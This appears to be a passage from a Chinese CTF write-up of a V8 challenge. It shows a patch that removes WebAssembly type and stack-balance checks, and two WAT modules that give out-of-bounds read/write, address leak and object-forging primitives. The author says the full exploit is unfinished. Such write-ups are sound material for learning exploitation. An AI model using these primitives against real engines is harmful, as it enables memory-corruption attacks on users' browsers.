- if (i::v8_flags.expose_async_hooks) {
- global_template->Set(isolate, "async_hooks",
- Shell::CreateAsyncHookTemplate(isolate));
- }
+ // global_template->Set(isolate, "printErr",
+ // FunctionTemplate::New(isolate, PrintErr));
+ // global_template->Set(isolate, "write",
+ // FunctionTemplate::New(isolate, WriteStdout));
+ // if (!i::v8_flags.fuzzing) {
+ // global_template->Set(isolate, "writeFile",
+ // FunctionTemplate::New(isolate, WriteFile));
+ // }
+ // global_template->Set(isolate, "read",
+ // FunctionTemplate::New(isolate, ReadFile));
+ // global_template->Set(isolate, "readbuffer",
+ // FunctionTemplate::New(isolate, ReadBuffer));
+ // global_template->Set(isolate, "readline",
+ // FunctionTemplate::New(isolate, ReadLine));
+ // global_template->Set(isolate, "load",
+ // FunctionTemplate::New(isolate, ExecuteFile));
+ // global_template->Set(isolate, "setTimeout",
+ // FunctionTemplate::New(isolate, SetTimeout));
+ // // Some Emscripten-generated code tries to call 'quit', which in turn would
+ // // call C's exit(). This would lead to memory leaks, because there is no way
+ // // we can terminate cleanly then, so we need a way to hide 'quit'.
+ // if (!options.omit_quit) {
+ // global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
+ // }
+ // global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
+ // global_template->Set(isolate, "performance",
+ // Shell::CreatePerformanceTemplate(isolate));
+ // global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
+
+ // // Prevent fuzzers from creating side effects.
+ // if (!i::v8_flags.fuzzing) {
+ // global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
+ // }
+ // global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
+
+ // if (i::v8_flags.expose_async_hooks) {
+ // global_template->Set(isolate, "async_hooks",
+ // Shell::CreateAsyncHookTemplate(isolate));
+ // }

return global_template;
}
diff --git a/src/wasm/function-body-decoder-impl.h b/src/wasm/function-body-decoder-impl.h
index b65ba5b9675..163fc536138 100644
--- a/src/wasm/function-body-decoder-impl.h
+++ b/src/wasm/function-body-decoder-impl.h
@@ -7878,27 +7878,27 @@ class WasmFullDecoder : public WasmDecoder<ValidationTag, decoding_mode> {
// if the current code is reachable even if it is spec-only reachable.
if (V8_LIKELY(decoding_mode == kConstantExpression ||
!control_.back().unreachable())) {
- if (V8_UNLIKELY(strict_count ? actual != arity : actual < arity)) {
- this->DecodeError("expected %u elements on the stack for %s, found %u",
- arity, merge_description, actual);
- return false;
- }
- // Typecheck the topmost {merge->arity} values on the stack.
- Value* stack_values = stack_.end() - arity;
- for (uint32_t i = 0; i < arity; ++i) {
- Value& val = stack_values[i];
- Value& old = (*merge)[i];
- if (!IsSubtypeOf(val.type, old.type, this->module_)) {
- this->DecodeError("type error in %s[%u] (expected %s, got %s)",
- merge_description, i, old.type.name().c_str(),
- val.type.name().c_str());
- return false;
- }
- if constexpr (static_cast<bool>(rewrite_types)) {
- // Upcast type on the stack to the target type of the label.
- val.type = old.type;
- }
- }
+ // if (V8_UNLIKELY(strict_count ? actual != arity : actual < arity)) {
+ // this->DecodeError("expected %u elements on the stack for %s, found %u",
+ // arity, merge_description, actual);
+ // return false;
+ // }
+ // // Typecheck the topmost {merge->arity} values on the stack.
+ // Value* stack_values = stack_.end() - arity;
+ // for (uint32_t i = 0; i < arity; ++i) {
+ // Value& val = stack_values[i];
+ // Value& old = (*merge)[i];
+ // if (!IsSubtypeOf(val.type, old.type, this->module_)) {
+ // this->DecodeError("type error in %s[%u] (expected %s, got %s)",
+ // merge_description, i, old.type.name().c_str(),
+ // val.type.name().c_str());
+ // return false;
+ // }
+ // if constexpr (static_cast<bool>(rewrite_types)) {
+ // // Upcast type on the stack to the target type of the label.
+ // val.type = old.type;
+ // }
+ // }
return true;
}
// Unreachable code validation starts here.

patch删去了wasm中对类型和栈平衡的检查,可以造成类型混淆和越界泄露

这个wat用来越界读写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
(module
(type $qjx (struct (field (mut i64))))
(func $qanux (param i64) (result (ref $qjx))
local.get 0
)
(func $oob_read (export "oob_read") (param i64) (result i64)
local.get 0
call $qanux
(struct.get $qjx 0)
)
(func $oob_write (export "oob_write") (param i64 i64)
local.get 0
call $qanux
local.get 1
(struct.set $qjx 0)
)
(func $leak_addr (export "leak_addr") (result i64 i64)
)
)

这个wat用来任意伪造对象或读对象地址

1
2
3
4
5
6
7
8
(module
(func (export "get_obj") (param externref) (result i64)
local.get 0
)
(func (export "make_obj") (param i64) (result externref)
local.get 0
)
)

使用wasm-tools将wat编译成wasm字节码

最终exp还没写完……

WMCTF2025-WriteUP by 0psu3 →